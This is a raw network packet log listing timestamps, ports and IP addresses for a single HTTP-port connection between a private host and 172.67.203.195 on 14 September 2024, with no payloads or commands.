Sep 14, 2024 18:31:14.569976091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.569999933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570034981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570067883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570090055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570122004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570143938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570174932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570213079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570238113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570269108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570302963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570326090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570355892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570390940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570413113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570444107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570476055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570497990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570528984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570560932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570581913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570612907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570645094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570667028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570697069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570730925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570750952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570784092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570816040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570838928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570871115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570904016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570924997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.570956945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.570991993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571022987 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.571047068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571080923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571099997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.571130991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571170092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571191072 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.571223021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571258068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571278095 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.571307898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571341038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571365118 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.571423054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571456909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571477890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.571507931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571541071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571561098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.571594000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.571662903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.573292971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573363066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573401928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573436022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.573503017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573556900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.573585033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573637009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573671103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573692083 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.573723078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573755026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573776007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.573807001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573838949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573859930 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.573890924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573924065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.573945999 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.573980093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.574013948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.574033976 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.574064016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.574098110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.574120998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.574151993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.574189901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.574210882 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.574240923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.574274063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.574295044 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.574326038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.574359894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.574383020 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.625214100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.629817009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.629931927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.629967928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630000114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630033970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630065918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630100965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630125999 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630126953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630126953 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630192041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630227089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630248070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630280018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630333900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630353928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630388975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630422115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630445004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630480051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630511999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630532026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630563021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630594969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630618095 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630647898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630680084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630698919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630732059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630764008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630795956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630820036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630852938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630872965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630903959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630935907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.630955935 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.630986929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.631020069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.631042957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.631077051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.631134987 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.663448095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.663569927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.663650036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.663686037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.663721085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.663753986 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.663784981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.663836956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.663871050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.663903952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.663938046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.663954973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664010048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664048910 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.664072037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664105892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664141893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.664160967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664194107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664226055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664258957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664293051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664324999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664357901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664383888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.664417028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664438009 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.664485931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664520025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664552927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.664594889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664628983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664650917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.664680958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664714098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664736032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.664766073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664797068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664819956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.664849043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664885998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664906979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.664938927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664971113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.664994001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665024996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665056944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665080070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665110111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665143967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665163994 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665194988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665230036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665251017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665281057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665313005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665335894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665365934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665399075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665422916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665453911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665489912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665510893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665540934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665574074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665596008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665625095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665658951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665678978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665709972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665741920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665760994 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665792942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665826082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665858030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665878057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665910006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665930986 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.665961027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.665992022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666013002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666045904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666076899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666096926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666127920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666160107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666179895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666212082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666248083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666268110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666297913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666330099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666357040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666384935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666419029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666440964 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666459084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666490078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666523933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666551113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666579008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666613102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666635036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666666985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666698933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666721106 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666752100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666784048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666805029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666836977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666870117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666892052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.666922092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666954994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.666976929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.667007923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.667047977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.667079926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.716804028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.716876030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.716960907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717034101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717068911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717099905 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717099905 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717160940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717194080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717250109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717283964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717307091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717358112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717391968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717412949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717444897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717477083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717498064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717529058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717561007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717581034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717616081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717669964 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717694044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717727900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717760086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717781067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717813969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717848063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717868090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717899084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717926979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.717951059 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.717981100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.718014002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.718034029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.718063116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.718096018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.718116045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.718147039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.718183041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.718202114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.750220060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750356913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.750389099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750448942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750503063 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.750530005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750581026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750614882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750652075 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.750670910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750726938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.750746965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750781059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750813961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750855923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750870943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.750912905 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.750940084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.750973940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751007080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751028061 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.751060963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751092911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751117945 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.751148939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751180887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751200914 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.751231909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751265049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751285076 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.751315117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751365900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.751430988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751463890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751496077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751517057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.751571894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751605034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.751624107 CEST	49738	80	192.168.2.4	172.67.203.195
